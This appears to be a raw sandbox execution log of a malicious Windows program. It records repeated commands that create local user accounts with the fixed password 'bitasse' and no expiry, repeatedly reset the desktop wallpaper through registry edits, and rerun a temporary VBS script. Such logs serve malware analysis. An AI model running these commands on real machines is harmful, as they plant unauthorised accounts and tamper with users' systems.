C:\Windows\system32\net.exe
net user 13982042422066 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 13982042422066 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\net.exe
net user 248421527631217 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 248421527631217 bitasse /add /expire:never /active:yes
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net.exe
net user 21904155148759 bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 21904155148759 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\net.exe
net user 1840380097177 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 1840380097177 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\net.exe
net user 18524648911123 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 18524648911123 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\net.exe
net user 43871908525489 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 43871908525489 bitasse /add /expire:never /active:yes
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net.exe
net user 314021462413291 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 314021462413291 bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\net.exe
net user 735291419152 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 735291419152 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net.exe
net user 64093165125703 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 64093165125703 bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\net.exe
net user 124422046724511 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 124422046724511 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net.exe
net user 147862219226991 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 147862219226991 bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\net.exe
net user 30027172512632 bitasse /add /expire:never /active:yes
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 30027172512632 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\net.exe
net user 203542707630234 bitasse /add /expire:never /active:yes
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 203542707630234 bitasse /add /expire:never /active:yes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\net.exe
net user 135591157417569 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 135591157417569 bitasse /add /expire:never /active:yes
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1617997407-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31845.vbs"
C:\Windows\system32\reg.exe
